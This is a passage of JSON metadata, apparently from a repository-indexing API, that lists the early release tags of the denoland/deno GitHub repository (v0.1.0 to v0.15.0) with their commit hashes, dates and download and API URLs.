0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tag